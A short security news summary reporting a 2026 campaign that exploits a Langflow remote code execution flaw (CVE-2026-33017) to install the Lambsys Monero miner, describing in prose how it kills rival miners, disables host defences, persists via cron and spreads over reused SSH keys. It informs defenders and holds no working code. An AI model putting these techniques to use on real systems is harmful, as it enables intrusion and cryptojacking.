Threat actors are actively exploiting CVE-2026-33017, a critical unauthenticated remote code execution vulnerability in Langflow (CVSS 9.3), to deploy a Monero cryptocurrency miner on exposed AI application endpoints. The campaign, observed between March 27 and April 15, 2026, involves scanning and targeting Langflow instances to gain initial access to enterprise networks.
According to Trend Micro researchers, the attack uses a single line of Python code evaluated inside an unauthenticated Langflow API endpoint to pull down a shell script, fetch a miner binary, and launch it as a detached process. The malware, named Lambsys, terminates competing miner processes (Kinsing, WatchDog, Rocke, Outlaw), deletes rival wallet and key material, disables host security controls (AppArmor, UFW, iptables, SELinux, kernel NMI watchdog, Aliyun agent), establishes cron-based persistence, and beacons to an external server. It also propagates via reused SSH keys, turning exposed Langflow instances into a pathway for broader compromise.
The Lambsys binary, an ELF executable written in Go, forks cascading shell subprocesses for reliability, removes system logs, and manipulates immutable file attributes. It contacts ipinfo.io for geolocation to optimize mining pool selection and geo-fencing. Trend Micro notes that an artifact from May 2024 indicates the threat actor has iterated on this malware for over two years. This campaign highlights how exposed AI application endpoints are becoming a new vector for cryptojacking attacks.
CVEs: CVE-2026-33017, CVE-2025-3248, CVE-2026-20245
Attack groups: Kinsing, WatchDog, Rocke, Outlaw
Malware: Lambsys, XMRig, Flodrix
Companies: Trend Micro, Alibaba Cloud
Products: Langflow
Original source: thehackernews.com